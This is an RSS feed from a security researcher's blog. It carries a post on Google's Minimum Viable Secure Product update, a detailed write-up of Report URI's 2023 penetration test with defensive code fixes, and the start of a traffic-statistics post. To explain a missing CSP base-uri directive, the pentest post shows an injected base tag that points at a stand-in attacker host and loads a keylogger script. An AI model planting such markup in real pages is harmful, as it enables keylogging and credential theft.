<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[Scott Helme]]></title><description><![CDATA[Hi, I'm Scott Helme, a Security Researcher, Entrepreneur and International Speaker. I'm the creator of Report URI and Security Headers, and I deliver world renowned training on Hacking and Encryption.]]></description><link>https://scotthelme.co.uk/</link><image><url>https://scotthelme.co.uk/favicon.png</url><title>Scott Helme</title><link>https://scotthelme.co.uk/</link></image><generator>Ghost 5.79</generator><lastBuildDate>Mon, 19 Feb 2024 13:11:52 GMT</lastBuildDate><atom:link href="https://scotthelme.co.uk/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[Google update their Minimum Viable Secure Product]]></title><description><![CDATA[<p>Back in 2021, Google launched, alongside other organisations, a new security baseline for products known as the Minimum Viable Secure Product. Now, 2 years later, they&apos;ve released an update to that standard.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/mvsp.svg" class="kg-image" alt loading="lazy" width="300" height="116"></figure><p></p><p>This a cross-post of my article on the Probely blog, you can <a href="https://probely.com/blog/google-update-their-minimum-viable-secure-product?ref=scotthelme.co.uk" rel="noreferrer">read the original</a> there.</p>]]></description><link>https://scotthelme.co.uk/google-announce-new-minimum-viable-secure-product/</link><guid isPermaLink="false">655caa933a9d56000144a9cc</guid><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Tue, 28 Nov 2023 13:50:15 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/11/mvsp.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/11/mvsp.png" alt="Google update their Minimum Viable Secure Product"><p>Back in 2021, Google launched, alongside other organisations, a new security baseline for products known as the Minimum Viable Secure Product. Now, 2 years later, they&apos;ve released an update to that standard.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/mvsp.svg" class="kg-image" alt="Google update their Minimum Viable Secure Product" loading="lazy" width="300" height="116"></figure><p></p><p>This a cross-post of my article on the Probely blog, you can <a href="https://probely.com/blog/google-update-their-minimum-viable-secure-product?ref=scotthelme.co.uk" rel="noreferrer">read the original</a> there.</p><p></p><h4 id="minimum-viable-secure-product">Minimum Viable Secure Product</h4><p>You can read the <a href="https://security.googleblog.com/2021/10/launching-collaborative-minimum.html?ref=scotthelme.co.uk" rel="noreferrer">original announcement</a> from Google if you like, but we&apos;ll be focusing a lot more <a href="https://security.googleblog.com/2023/11/two-years-later-baseline-that-drives-up.html?ref=scotthelme.co.uk" rel="noreferrer">on the update</a> released a couple of days ago. 
The <a href="https://mvsp.dev/?ref=scotthelme.co.uk" rel="noreferrer">MVSP site</a> is also a great place to get a lot more detail on the project and track future changes or updates.</p><p>In terms of what the MVSP project is trying to achieve, I think this snippet from the site gives a really good idea of exactly what it&apos;s about:</p><p></p><blockquote>Minimum Viable Secure Product (MVSP) is a list of essential application security controls that should be implemented in enterprise-ready products and services. The controls are designed to be simple to implement and provide a good foundation for building secure and resilient systems and services. MVSP is based on the experience of contributors in enterprise application security and has been built with contributions from a range of companies.</blockquote><p></p><p>I&apos;ve said myself many times in the past that sometimes, we need to focus on getting the basics right before we get carried away on more complex or elaborate risk reduction, and MVSP aligns extremely well with that approach. You should read through all of the requirements outlined on the site, of course, but I&apos;m going to pick a few that are near and dear to my heart to focus on!</p><p></p><h4 id="%C2%A711-external-vulnerability-reports">&#xA7;1.1 External Vulnerability Reports</h4><p>As I sit and write this blog post, I&apos;m currently going through two responsible disclosure processes where I&apos;m desperately trying to get in touch with the organisations in question. I&apos;ve tried email to customer services, I&apos;ve raised a support ticket, I&apos;ve reach out to people listed as employees on Linked In and finally, I have to resort to public calls for help:</p><p></p>
<!--kg-card-begin: html-->
<blockquote class="twitter-tweet tw-align-center"><p lang="en" dir="ltr">Hey <a href="https://twitter.com/capellisport?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">@capellisport</a>, we&apos;ve made several attempts to contact you via various channels! <br><br>Does anyone have a security contact or some way of reaching an appropriate person? Please reach out, my DMs are open.</p>&#x2014; Scott Helme (@Scott_Helme) <a href="https://twitter.com/Scott_Helme/status/1726906880130465911?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">November 21, 2023</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script><br>
<!--kg-card-end: html-->
<p></p><p>This is downright ridiculous and it should not be this hard to get in touch with an organisation to let them know that they have a serious security issue!! That&apos;s precisely what the <a href="https://scotthelme.co.uk/say-hello-to-security-txt/?ref=scotthelme.co.uk" rel="noreferrer">Security.txt</a> file is for. You can read the full details in that blog post, but the TL;DR: it&apos;s a simple text file you host with details on how people can contact you to report security vulnerabilities / responsible disclosure.</p><p>You can see mine here:<br><a href="https://scotthelme.co.uk/.well-known/security.txt?ref=scotthelme.co.uk">https://scotthelme.co.uk/.well-known/security.txt</a><br><a href="https://report-uri.com/.well-known/security.txt?ref=scotthelme.co.uk">https://report-uri.com/.well-known/security.txt</a><br><a href="https://securityheaders.com/.well-known/security.txt?ref=scotthelme.co.uk">https://securityheaders.com/.well-known/security.txt</a></p>
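<p>To give you an idea of what&apos;s inside, here&apos;s a rough sketch of a minimal security.txt; every value below is an illustrative placeholder, so swap in your own details:</p><pre><code class="language-text">Contact: mailto:security@example.com
Contact: https://example.com/security-contact
Expires: 2025-12-31T23:59:59.000Z
Encryption: https://example.com/pgp-key.txt
Preferred-Languages: en
Canonical: https://example.com/.well-known/security.txt</code></pre>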
<p></p><h4 id="%C2%A714-external-testing">&#xA7;1.4 External Testing</h4><p>No matter how good your own security processes are, you always need another set of eyes to spot the issues you&apos;ve missed. As a penetration tester for many years myself, I understand the value of such services from both sides of the conversation, as the &apos;hacker&apos; conducting the test, and as the company on the receiving end. My own company, <a href="https://report-uri.com/?ref=scotthelme.co.uk" rel="noreferrer">Report URI</a>, has just had its annual penetration test completed by an external company and, as always, the <a href="https://scotthelme.co.uk/report-uri-penetration-test-2023/?ref=scotthelme.co.uk" rel="noreferrer">full report is published</a> for anyone to see!</p><p></p><figure class="kg-card kg-image-card"><a href="https://pentest.co.uk/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/11/pentest-1.png" class="kg-image" alt="Google update their Minimum Viable Secure Product" loading="lazy" width="375" height="84"></a></figure><p></p><p>I don&apos;t think you can just have an annual penetration test and then brush your hands together and say &apos;all good&apos;, though. Penetration tests won&apos;t find all issues and, if you&apos;re only having a test once per year, an issue could easily sit around for 6+ months until it&apos;s discovered. Not good... That&apos;s why it&apos;s also a great idea to use a <a href="https://probely.com/?ref=scotthelme.co.uk" rel="noreferrer">DAST solution like Probely</a> that can scan your application for vulnerabilities on a far more regular basis. </p><p></p><figure class="kg-card kg-image-card"><a href="https://probely.com/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/11/probely.png" class="kg-image" alt="Google update their Minimum Viable Secure Product" loading="lazy" width="263" height="55"></a></figure><p></p><p>Just like a penetration test, Probely (or any other tool) won&apos;t find all issues, but it can find issues much sooner and far more cheaply than a penetration test. There&apos;s no point in spending thousands of dollars for a penetration tester to find and report issues that you could have found for hundreds of dollars instead. 
Not only that, but you can find them sooner, and we&apos;ve all seen the graph on the cost of fixing bugs, right?</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/cost-to-fix-bugs.png" class="kg-image" alt="Google update their Minimum Viable Secure Product" loading="lazy" width="1080" height="1080" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/cost-to-fix-bugs.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/11/cost-to-fix-bugs.png 1000w, https://scotthelme.co.uk/content/images/2023/11/cost-to-fix-bugs.png 1080w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Remember that all security vulnerabilities like this are basically just bugs that need fixing! The sooner you find them, the cheaper they are to fix and the less risk you&apos;re exposed to.</p><p></p><h4 id="%C2%A723-security-headers">&#xA7;2.3 Security Headers</h4><p>Yeah! Who doesn&apos;t love some Security Headers?! Not only do they recommend using Security Headers (the actual HTTP response headers), but they also recommend using <a href="https://securityheaders.com/?ref=scotthelme.co.uk" rel="noreferrer">Security Headers (our website!)</a> to scan and assess your headers!</p><p></p><figure class="kg-card kg-image-card"><a href="https://securityheaders.com/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/11/image-24.png" class="kg-image" alt="Google update their Minimum Viable Secure Product" loading="lazy" width="508" height="178"></a></figure><p></p><p>You can see the recommendation and link to us <a href="https://mvsp.dev/faq-mvsp.en/?ref=scotthelme.co.uk#FAQ_2_3" rel="noreferrer">right here</a>, and I&apos;m super grateful that our free service is mentioned like this. Head over to <a href="https://securityheaders.com/?ref=scotthelme.co.uk" rel="noreferrer">our site</a> and you can perform a free scan that takes 2-3 seconds right now!</p><p></p><h4 id="%C2%A733-vulnerability-prevention">&#xA7;3.3 Vulnerability prevention</h4><p>After working in the Cyber Security world for so long, one thing I realised is that there are always solutions to any problem you may have, and often, they&apos;re quite easy. The problem that I&apos;ve always come across is that people simply didn&apos;t know about the solution, and it&apos;s one of the things I focus on in both training courses I deliver. 
You can see full details on my <a href="https://scotthelme.co.uk/training/?ref=scotthelme.co.uk" rel="noreferrer">Training page</a>, but here&apos;s the summary of the two training courses I deliver:</p><p></p><figure class="kg-card kg-image-card"><a href="https://www.troyhunt.com/workshops/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2020/06/training-page-image.JPG" class="kg-image" alt="Google update their Minimum Viable Secure Product" loading="lazy"></a></figure><p><a href="https://www.troyhunt.com/workshops/?ref=scotthelme.co.uk" rel="noreferrer">Hack Yourself First</a>: In collaboration with <a href="https://twitter.com/troyhunt?ref=scotthelme.co.uk" rel="noreferrer">Troy Hunt</a>, I deliver his awesome, 2-day workshop where we learn how to hack into our demo application and then how to defend against those attacks.</p><p></p><figure class="kg-card kg-image-card"><a href="https://www.feistyduck.com/training/practical-tls-and-pki?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/11/image-25.png" class="kg-image" alt="Google update their Minimum Viable Secure Product" loading="lazy" width="970" height="442" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-25.png 600w, https://scotthelme.co.uk/content/images/2023/11/image-25.png 970w" sizes="(min-width: 720px) 720px"></a></figure><p><a href="https://www.feistyduck.com/training/practical-tls-and-pki?ref=scotthelme.co.uk" rel="noreferrer">Practical TLS and PKI</a>: In collaboration with <a href="https://twitter.com/ivanristic?ref=scotthelme.co.uk" rel="noreferrer">Ivan Ristic</a>, I deliver his incredible, 2-day training where we deploy and fully configure TLS and PKI in real-world environments. This training course also ties in superbly well with MVSP &#xA7;2.2 HTTPS-only and &#xA7;2.8 Encryption!</p><p></p><h4 id="do-you-meet-the-mvsp-requirements">Do you meet the MVSP requirements?</h4><p>I&apos;m sure that many of you reading this blog post will be able to quickly flick through the list of requirements and check them off, but can you check off all of them?</p><p>It&apos;s really interesting to see the direction that MVSP is going in and I wholeheartedly agree with everything that&apos;s in there. As the name would imply, this is the <strong><em>Minimum</em></strong> Viable Secure Product and not the <strong><em>Maximum</em></strong> Viable Secure Product, so you could and should be exceeding many of these requirements, especially if you&apos;re a security-focused company like we are! 
I&apos;d like to leave you with this quote from the MVSP docs, emphasis mine:</p><p></p><blockquote>Minimum Viable Secure Product (MVSP) is a list of <strong>essential</strong> application security controls that should be implemented in enterprise-ready products and services.</blockquote><p></p>]]></content:encoded></item><item><title><![CDATA[Report URI Penetration Test 2023]]></title><description><![CDATA[<p>It&apos;s that time of year again at <a href="https://report-uri.com/?ref=scotthelme.co.uk" rel="noreferrer">Report URI</a>, right before we start getting festive, that we have our annual penetration test, and 2023 is going to be the fourth test that we&apos;ve published in full.</p><p></p><figure class="kg-card kg-image-card"><a href="https://report-uri.com/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/11/report-uri.png" class="kg-image" alt loading="lazy" width="946" height="525" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/report-uri.png 600w, https://scotthelme.co.uk/content/images/2023/11/report-uri.png 946w" sizes="(min-width: 720px) 720px"></a></figure><p></p><h4 id="penetration-tests">Penetration Tests</h4><p>Our previous penetration tests, which were also published publicly, were</p>]]></description><link>https://scotthelme.co.uk/report-uri-penetration-test-2023/</link><guid isPermaLink="false">65490ebd5065ae0001b5e1b0</guid><category><![CDATA[Report URI]]></category><category><![CDATA[Penetration Test]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Mon, 20 Nov 2023 11:05:19 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/11/pen-test-report-banner.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/11/pen-test-report-banner.png" alt="Report URI Penetration Test 2023"><p>It&apos;s that time of year again at <a href="https://report-uri.com/?ref=scotthelme.co.uk" rel="noreferrer">Report URI</a>, right before we start getting festive, that we have our annual penetration test, and 2023 is going to be the fourth test that we&apos;ve published in full.</p><p></p><figure class="kg-card kg-image-card"><a href="https://report-uri.com/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/11/report-uri.png" class="kg-image" alt="Report URI Penetration Test 2023" loading="lazy" width="946" height="525" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/report-uri.png 600w, https://scotthelme.co.uk/content/images/2023/11/report-uri.png 946w" sizes="(min-width: 720px) 720px"></a></figure><p></p><h4 id="penetration-tests">Penetration Tests</h4><p>Our previous penetration tests, which were also published publicly, were back in <a href="https://scotthelme.co.uk/report-uri-penetration-test-2020/?ref=scotthelme.co.uk" rel="noreferrer">2020</a>, <a href="https://scotthelme.co.uk/report-uri-penetration-test-2021/?ref=scotthelme.co.uk" rel="noreferrer">2021</a> and <a href="https://scotthelme.co.uk/report-uri-penetration-test-2022/?ref=scotthelme.co.uk" rel="noreferrer">2022</a>, and now it&apos;s time for the 2023 edition. Just as before, there were no artificial limits placed on the scope of the penetration test, and it was a 5-day test. Again, we provided our source code as part of our test because it can help the tester move much more quickly and confirm or even discover issues by looking over the code. 
I really stressed the point that we wanted to be absolutely confident that we didn&apos;t have any issues lurking after another year of introducing new code and bug fixes, so I requested the best tester they had on staff. I also provided as much information as I could: full-featured accounts, test data, a demo of the application and access to our source code. </p><p></p><h4 id="the-results">The Results</h4><p>Maintaining the same number of findings as last year, but swapping around the ratings a little, here is the summary for our 2023 findings.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-18.png" class="kg-image" alt="Report URI Penetration Test 2023" loading="lazy" width="607" height="388" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-18.png 600w, https://scotthelme.co.uk/content/images/2023/11/image-18.png 607w"></figure><p></p><p>This is an outcome to be really pleased with, given that we were trying our best to uncover any issues that we may have, and it leaves me feeling really confident that our existing processes continue to serve us well. Let&apos;s take a look through the report in more detail and see exactly what was found.</p><p></p><h4 id="51-vulnerabilities-in-outdated-dependencies-detected">5.1 Vulnerabilities in Outdated Dependencies Detected</h4><p>Again?! This one did come as a little bit of a surprise to me and you may recognise this from the 2022 report. This finding is in a different dependency that has since had an issue identified, but I was surprised that we were able to use a dependency with a known vulnerability. </p><p>We have a GitHub action that checks all of our JS dependencies for known issues, but it seems it was having trouble with this one, which I&apos;m investigating further. This has now been resolved and the dependency updated!</p><p></p><figure class="kg-card kg-image-card"><a href="https://security.snyk.io/vuln/npm:datatables:20151106?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/11/image-23.png" class="kg-image" alt="Report URI Penetration Test 2023" loading="lazy" width="1259" height="738" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-23.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/11/image-23.png 1000w, https://scotthelme.co.uk/content/images/2023/11/image-23.png 1259w" sizes="(min-width: 720px) 720px"></a></figure><p></p><p>It was also noted that our version of Bootstrap was EOL, but there are currently no known issues and we have our CSP as an additional control too. This is something we&apos;re aware of and it will be addressed in due course.</p><p></p><h4 id="52-insecure-tlsssl-configuration">5.2 Insecure TLS/SSL Configuration</h4><p>This was only raised as an info item on the report and is also something we&apos;re aware of. Given the wide variety of clients that report telemetry to us, we do have a wide array of cipher suites on offer to support them all. We do support the latest and greatest protocol versions and cipher suites, so modern clients will always have the best protection available. We won&apos;t be making any changes for this item and, if you&apos;d like, you can view our <a href="https://www.ssllabs.com/ssltest/analyze.html?d=report-uri.com&amp;latest=&amp;ref=scotthelme.co.uk" rel="noreferrer">SSL Labs results</a>. 
</p><p></p><figure class="kg-card kg-image-card"><a href="https://www.ssllabs.com/ssltest/analyze.html?d=report-uri.com&amp;latest=&amp;ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/11/image-22.png" class="kg-image" alt="Report URI Penetration Test 2023" loading="lazy" width="1033" height="580" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-22.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/11/image-22.png 1000w, https://scotthelme.co.uk/content/images/2023/11/image-22.png 1033w" sizes="(min-width: 720px) 720px"></a></figure><p></p><h4 id="53-csp-configured-without-%E2%80%98base-uri%E2%80%99-directive">5.3 CSP configured without &#x2018;base-uri&#x2019; directive</h4><p>We had previously and consciously not set the <code>base-uri</code> directive in our Content Security Policy. The <code>&lt;base&gt;</code> tag in HTML allows you to set the base URL for path-relative assets, like so:</p><pre><code class="language-html">&lt;base href=&quot;https://evil-cyber-hacker.com/&quot;&gt;
&lt;script src=&quot;/keylogger.js&quot;&gt;&lt;/script&gt;</code></pre><p></p><p>The URL used to load the script by the browser would now be:</p><p> <code>https://evil-cyber-hacker.com/keylogger.js</code></p><p></p><p>The problem for the attacker is that the JS load would still be subject to the strict <code>script-src</code> directive in our CSP, and the <code>evil-cyber-hacker.com</code> domain is not allowed, so the script wouldn&apos;t load. Ultimately, the <code>base-uri</code> directive not being present wouldn&apos;t allow an attacker to do anything, but we still added it anyway!</p><p></p><h4 id="appendix">Appendix</h4><p>We then get on to some really interesting parts of the report that can only be found in the Appendix because they were not actually findings on the test, but they could have been if circumstances were different. I&apos;m really proud of this section and it just goes to show how our <a href="https://en.wikipedia.org/wiki/Defense_in_depth_(computing)?ref=scotthelme.co.uk" rel="noreferrer">Defense In Depth</a> strategy can really pay off!</p><p></p><h4 id="a1-codeigniter-validation-placeholders-rce">A1. CodeIgniter Validation Placeholders RCE</h4><p>When Report URI was first built, it used the CodeIgniter framework exclusively. Over the years we have slowly migrated away from CodeIgniter and that migration is almost complete, with very, very little of our application even touching CodeIgniter now. </p><p>A new feature called Validation Placeholders contained a pretty serious Remote Code Execution vulnerability; the feature was not supported in the version of CodeIgniter we use, nor was its predecessor feature used by our code. You can read the full details in the <a href="https://github.com/codeigniter4/CodeIgniter4/security/advisories/GHSA-m6m8-6gq8-c9fj?ref=scotthelme.co.uk" rel="noreferrer">security advisory</a>, so I won&apos;t reproduce them here, but I was able to quickly evaluate the functionality of Validation Placeholders, and of our usage of Validation Rules, to determine that we were not vulnerable. Despite that, we still took robust action. I will quote directly from the report:</p><p></p><blockquote>While Report URI used CI 3, which did not have the vulnerable feature, a patch was deployed the same day which addressed any remaining concerns. All validation rules were changed to use arrays, rather than pipe format shown in examples above. This prevents the sort of injection which enabled the placeholders to execute code. A static analysis rule was also added which forces validation rules to use Report URI&#x2019;s wrapped rules, rather than CI&#x2019;s default ones. Finally, the wrapped rules were changed to only accept arrays and not strings.</blockquote><p></p><blockquote>However, without CI 4&#x2019;s placeholders, untrusted data is never injected into the execution context, as one would expect... As such, while Report URI was never exposed to this vulnerability, additional measures have been taken to further strengthen defences against it. Finally, this issue also encouraged Report URI to accelerate their transition away from CodeIgniter.</blockquote>
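<p>To make the array-vs-pipe change in the quote above a little more concrete, here&apos;s a rough sketch of the two styles of defining a validation rule in CodeIgniter; the field and rules are invented for the example:</p><pre><code class="language-php">// Pipe format: the rules arrive as one string that the framework has to
// parse, so anything woven into that string is treated as rule syntax.
$this-&gt;form_validation-&gt;set_rules(&apos;email&apos;, &apos;Email&apos;, &apos;required|valid_email&apos;);

// Array format: each rule is a discrete element and no combined string
// is ever parsed, which closes off that style of injection.
$this-&gt;form_validation-&gt;set_rules(&apos;email&apos;, &apos;Email&apos;, [&apos;required&apos;, &apos;valid_email&apos;]);</code></pre>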
<p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-19.png" class="kg-image" alt="Report URI Penetration Test 2023" loading="lazy" width="1186" height="667" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-19.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/11/image-19.png 1000w, https://scotthelme.co.uk/content/images/2023/11/image-19.png 1186w" sizes="(min-width: 720px) 720px"></figure><p></p><p></p><p></p><h4 id="a2-race-condition-on-email-change">A2. Race Condition on Email Change</h4><p>This was an interesting issue for the tester to come across and one that was pretty easy for us to resolve. By submitting multiple requests to change the email address on an account within the same HTTP/2 packet, a user account could be &apos;cloned&apos; into several instances of the same account, each with a different email address associated. </p><p></p><blockquote>During penetration testing, a race condition vulnerability was identified in the user email address change functionality. While the condition enabled the creation of duplicate user accounts, it was without immediate security risk, due to the robust &quot;fail fast and fail early&quot; principles employed by the application. The duplicates were clones, inheriting access to the original accounts&apos; subscriptions &#x2013; meaning that each duplicated account had their usage counted against the original account&#x2019;s limits.</blockquote><p></p><p>There were no security concerns presented by this issue and it only posed a problem for the person &apos;cloning&apos; their account because it would break certain functionality of their account and yield no benefits. This issue is possible because of inherent limitations in <a href="https://scotthelme.co.uk/working-with-azure-table-storage/?ref=scotthelme.co.uk" rel="noreferrer">Azure Table Storage</a> not being accounted for in our code. I wrote about why I chose Table Storage all the way back in <a href="https://scotthelme.co.uk/choosing-and-using-azure-table-storage-for-report-uri-io/?ref=scotthelme.co.uk" rel="noreferrer">2015</a>.</p><p>Table Storage is a simple key:value store and it doesn&apos;t support atomic operations. Entities are inserted into a table and have two properties, the Partition Key and Row Key, that form the primary key for lookup. Because of the unique constraint on the combination of the Partition Key and Row Key, we store the user email address in the Row Key to prevent duplication of accounts with the same email address. The Partition Key and Row Key can&apos;t be modified for an entity; they are the only properties that are permanent. This means that to change the email address for a user, we have to clone their user entity into a new entity with a different email address in the Row Key, insert the new entity and delete the old entity. It was racing the delete process that made this issue possible.</p><p>Because Table Storage doesn&apos;t support atomic operations, I couldn&apos;t fix the problem there, so I turned to our Redis cache, which does support atomic operations. By implementing a new &apos;user entity write lock&apos; mechanism, we could leverage Redis to easily resolve this problem.</p>
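<p>As a rough sketch of how such a lock can wrap the clone-and-delete sequence, with hypothetical helper functions standing in for our actual entity code, the flow looks something like this:</p><pre><code class="language-php">function changeEmail(Redis $redis, string $oldEmail, string $newEmail): bool
{
    // Atomically claim the lock; NX means the set fails if the key
    // already exists, EX expires it automatically after 15 seconds.
    if (!$redis-&gt;set(&apos;entityLock:&apos; . $oldEmail, &apos;1&apos;, [&apos;NX&apos;, &apos;EX&apos; =&gt; 15])) {
        return false; // another change for this account is already in flight
    }

    $entity = loadUserEntity($oldEmail);  // hypothetical helpers, not our real code
    insertUserEntity($newEmail, $entity); // clone the entity with the new Row Key
    deleteUserEntity($oldEmail);          // racing this delete caused the issue

    return true; // the lock simply expires, which also rate-limits changes
}</code></pre>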
<p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-20.png" class="kg-image" alt="Report URI Penetration Test 2023" loading="lazy" width="1201" height="859" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-20.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/11/image-20.png 1000w, https://scotthelme.co.uk/content/images/2023/11/image-20.png 1201w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Here&apos;s the code to do this in Redis:</p><pre><code class="language-php">$this-&gt;redis-&gt;set(&apos;entityLock:&apos; . $email, &apos;1&apos;, [&apos;NX&apos;, &apos;EX&apos; =&gt; 15]);</code></pre><p></p><p>To snip the explanation text from the issue:</p><blockquote>The NX option will cause the write to Redis to fail if the key already exists, and the EX option sets the expiry on the key to 15 seconds. This means a user can only change their email address every 15 seconds, but fixes the race condition found in the penetration test.</blockquote><p></p><p>To quote the penetration test report:</p><blockquote>Despite the lack of security implications, it is worth commending Report URI&#x2019;s swift remediation of the issue.</blockquote><p></p><h4 id="a3-potential-issue-%E2%80%93-path-access-control">A3. Potential Issue &#x2013; Path Access Control </h4><p>We have some Controllers that perform functions only intended to be triggered from the Command-Line Interface, and our Router takes care of ensuring that any requests coming in from Nginx can&apos;t hit them. It turns out we had a small bug in our Router code and you could indeed hit these Controllers with HTTP requests. Despite this, there was no issue, and I will quote from the report:</p><p></p><blockquote>However, all affected controllers inherited from a base command line controller class, whose constructor performed an additional verification of the execution context. Any attempt to create (access) these controllers outside of a command-line context would raise an error, as demonstrated below: <br><br><em>-snip-</em><br><br>As such, while it was never possible to reach the affected controllers, this issue highlights the importance of not making assumptions when security could be affected. Thanks to robust code and multi-layered validation, the application prevented the issue from being exploitable &#x2013; and in fact, entirely mitigated the vulnerability before it was even discovered. Report URI has since patched the issue to remove any residual risk.</blockquote>
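<p>The kind of constructor guard the report describes is easy to picture; a minimal sketch, offered as an illustration rather than Report URI&apos;s actual code, might look like this:</p><pre><code class="language-php">abstract class CommandLineController
{
    public function __construct()
    {
        // Refuse to be constructed outside of a command-line context,
        // even if a routing bug lets an HTTP request reach a subclass.
        if (PHP_SAPI !== &apos;cli&apos;) {
            throw new RuntimeException(&apos;This controller is CLI-only.&apos;);
        }
    }
}</code></pre>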
<p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-21.png" class="kg-image" alt="Report URI Penetration Test 2023" loading="lazy" width="1111" height="547" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-21.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/11/image-21.png 1000w, https://scotthelme.co.uk/content/images/2023/11/image-21.png 1111w" sizes="(min-width: 720px) 720px"></figure><p></p><p>It&apos;s hard to imagine what someone could do with this capability; maybe they could update our aggregate count data a little more frequently, but either way, it was still a bug that needed to be fixed!</p><p></p><h4 id="another-success">Another Success!</h4><p>I think it&apos;s fair to say that this test went exceptionally well, and despite all of our best efforts over the last 12 months, there are still improvements that we&apos;ve had to make as a result of getting the test done. As I&apos;ve said before, you really want to help a tester as much as you can to get the most value out of a test like this, and as before, here is the full, unredacted PDF report if you&apos;d like a read.</p><p></p><p><a href="https://cdn.report-uri.com/pdf/Report%20URI%20-%202023%20Penetration%20Test%20Report.pdf?ref=scotthelme.co.uk" rel="noreferrer">Report URI - 2023 Penetration Test Report</a></p><p></p>]]></content:encoded></item><item><title><![CDATA[Report URI: A week in numbers! (2023 edition)]]></title><description><![CDATA[<p>I simply can&apos;t believe that Report URI has now processed 1,500,000,000,000+ reports, which is unreal! That&apos;s over one trillion, five hundred billion reports... &#x1F92F;</p><p>This tiny little project, which I had the idea of starting all those years ago, is now processing</p>]]></description><link>https://scotthelme.co.uk/report-uri-a-week-in-numbers-2023-edition/</link><guid isPermaLink="false">650d63f15f929f0001f8a3fa</guid><category><![CDATA[Report URI]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Fri, 10 Nov 2023 15:12:49 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/11/cpu.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/11/cpu.png" alt="Report URI: A week in numbers! (2023 edition)"><p>I simply can&apos;t believe that Report URI has now processed 1,500,000,000,000+ reports, which is unreal! That&apos;s over one trillion, five hundred billion reports... &#x1F92F;</p><p>This tiny little project, which I had the idea of starting all those years ago, is now processing incredibly large amounts of data on a day-by-day basis. So why don&apos;t we take a look at the numbers?</p><p></p><figure class="kg-card kg-image-card"><a href="https://report-uri.com/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/11/Report-URI-Twitter-Card.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)"
(2023 edition)" loading="lazy" width="800" height="400" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/Report-URI-Twitter-Card.png 600w, https://scotthelme.co.uk/content/images/2023/11/Report-URI-Twitter-Card.png 800w" sizes="(min-width: 720px) 720px"></a></figure><p></p><h4 id="report-uri">Report URI</h4><p>If you aren&apos;t familiar with <a href="https://report-uri.com/?ref=scotthelme.co.uk" rel="noreferrer">Report URI</a>, here&apos;s the TDLR: Modern web browsers have a heap of security and monitoring capabilities built in, and when something goes wrong on your site, they can send telemetry to let you know you have a problem. We ingest that telemetry on behalf of our customers, and extract the value from the data.</p><p>Over the years, as our customer base has grown, we are of course receiving more and more telemetry from more and more clients. This has also been expanded to include email servers which can also send telemetry about the security of emails you send! If you want any details on our product offering, the Products menu on our <a href="https://report-uri.com/?ref=scotthelme.co.uk" rel="noreferrer">homepage</a> will help you out, but this blog post isn&apos;t about that, it&apos;s about the numbers!</p><p></p><h4 id="our-infrastructure">Our infrastructure</h4><p>In a recent <a href="https://scotthelme.co.uk/unravelling-mystery-of-truncated-post-requests-report-uri/?ref=scotthelme.co.uk" rel="noreferrer">blog post</a> I gave an overview of our infrastructure which really hasn&apos;t changed much over the years and has held up really well to the volume of traffic we&apos;re handling. I&apos;ll repeat the highlights here because it will help make the following data more understandable once I get into it. 